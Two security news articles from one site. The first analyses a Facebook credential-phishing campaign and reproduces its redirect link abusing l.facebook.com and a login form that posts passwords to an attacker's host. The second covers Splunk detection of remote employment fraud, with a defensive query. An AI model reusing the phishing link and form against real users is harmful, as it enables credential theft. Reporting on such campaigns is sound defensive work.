A sophisticated phishing campaign has recently emerged, targeting Facebook users with carefully crafted emails designed to harvest login credentials.

Attackers leverage the platform’s own external URL warning system to cloak malicious links, presenting URLs that appear legitimate while redirecting victims to counterfeit Facebook login pages.

The initial lure arrives as an urgent security notification, warning users of “unauthorized access attempts” or prompting them to verify account activity.

The email’s design closely mirrors Facebook’s styling, complete with social media icons and footer disclaimers, creating a sense of authenticity and leading recipients to click without hesitation.

The campaign’s reach spans multiple languages, including English, German, Spanish, and Korean, broadening its potential victim pool.

Phishing URLs consistently follow a pattern of benign domains forwarded through Facebook’s redirector service (e.g., httpst.co/MS24b2xu6p), which then reroute to attackers’ infrastructure.

SpiderLabs analysts identified this technique after examining dozens of email samples, noting how the redirect mechanism both evades link scanners and bypasses user suspicion.

Victims who follow the link encounter a near-perfect replica of Facebook’s login interface, where credentials submitted are immediately exfiltrated to a command-and-control server.

On successful submission, the fake portal executes a brief JavaScript snippet to display an “Incorrect password” error, prompting users to re-enter their details—unwittingly supplying attackers with valid credentials on the second attempt.

The harvested data includes email addresses, phone numbers, and passwords, which are stored in a PHP backend script for later retrieval by threat actors.

Redirect-Based Infection Mechanism

The core innovation of this phishing campaign lies in its abuse of Facebook’s external URL warning system as an infection mechanism.

Rather than linking directly to malicious domains, attackers construct a URL of the form:-

<a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fataloraxmalicious.co%2Ffb.php&h=AT0Xyz…">
  Verify Your Account
</a>

This link leverages Facebook’s l.facebook.com redirect service, embedding the actual phishing site in the u= parameter.

When clicked, Facebook presents a warning banner but ultimately forwards the victim to the malicious page, lending credibility to the destination.

Once on the phishing site, the HTML form collects credentials via:-

<form action="https://ataloraxmalicious.co/fb.php" method="POST">
  <input type="text" name="email" autocomplete="username"/>
  <input type="password" name="pass" autocomplete="current-password"/>
  <button type="submit">Log In</button>
</form>

Upon submission, a JavaScript routine triggers a second redirect back to Facebook, displaying an error notice to the user and minimizing suspicion.

This redirect-based infection mechanism not only bypasses email security gateways but also exploits user trust in Facebook’s domain, making detection and prevention significantly more challenging.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

The post New Phishing Attack Targets Facebook Users to Steal Login Credentials appeared first on Cyber Security News.

Detecting remote employment fraud has become a critical priority for organizations striving to secure their digital onboarding processes and safeguard sensitive systems.

In recent months, threat actors posing as legitimate hires have leveraged sophisticated tactics to bypass pre-hire screenings and embed themselves within corporate networks.

This emerging threat vector, known as Remote Employment Fraud (REF), exploits gaps between human resources workflows and security monitoring, allowing malicious insiders to gain persistent access and exfiltrate data under the cover of a legitimate employee identity.

The initial stages of REF involve threat actors meticulously crafting resumes, passing background checks, and scheduling interviews that appear indistinguishable from genuine candidates.

Once onboarded, they request shipment of corporate assets—laptops, mobile devices, or network tokens—to addresses that often diverge from their purported locations.

Through careful correlation of asset management logs with applicant tracking data, organizations can reveal discrepancies that point to fraudulent activity.

Splunk analysts identified the first wave of these anomalies by matching ServiceNow shipment records against Workday employee profiles, flagging cases where the delivered location did not align with an employee’s registered home state.

Splunk analysts noted that REF actors frequently leverage nonstandard VPN services to obfuscate their true IP addresses and geolocations.

While virtual private networks are commonplace for legitimate remote work, inconsistencies between expected corporate VPN endpoints and unusual third-party VPN providers serve as strong indicators of fraud.

By creating baselines in Identity Provider (IdP) logs—such as Okta or Duo—security teams can detect anomalous VPN sessions and enforce network zones that block unauthorized anonymizer services.

Beyond transport-layer evasion, REF actors may employ improbable travel tactics to mask their origin.

Login attempts from geographically distant locations within implausible timeframes—such as a login from London minutes after a session in New York—underscore the need for geospatial analytics.

Splunk Enterprise Security’s Authentication Data Model can calculate approximate travel speed between login events to surface these anomalies, enabling rapid investigation before a breach escalates.

Infection Mechanism and Persistence Through Asset Misshipment

An in-depth look at the most prevalent REF infection mechanism reveals how initial device shipment inconsistencies provide the foothold for continued access.

Threat actors request corporate laptops to be sent to alternate locations, often invoking urgent personal circumstances to justify mismatches.

Once the device arrives, embedded persistence tactics—such as installing unsanctioned remote access tools—ensure ongoing connectivity.

Security teams can prevent these operations by correlating applicant tracking system (ATS) data with IT asset logs in Splunk.

index=servicenow sourcetype=laptop_shipment
| eval delivered_location=case(arrivalState="CA","California", arrivalState="TX","Texas")
| join type=outer Email [search index=identity sourcetype=workday_employee]
| eval Suspicious=if(delivered_location!=home_state,"Yes","No")
| search Suspicious="Yes"
| table name, employeeId, home_state, delivered_location, Email

By automating this detection query, organizations can immediately surface potential REF cases, prompting joint investigations by security and HR teams.

Integrating these detections into a Risk-Based Alerting (RBA) framework further enhances visibility, enabling prioritized incident response workflows that minimize false positives and drive efficient mitigation.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

The post Splunk Releases Guide to Detect Remote Employment Fraud Within Your Organization appeared first on Cyber Security News.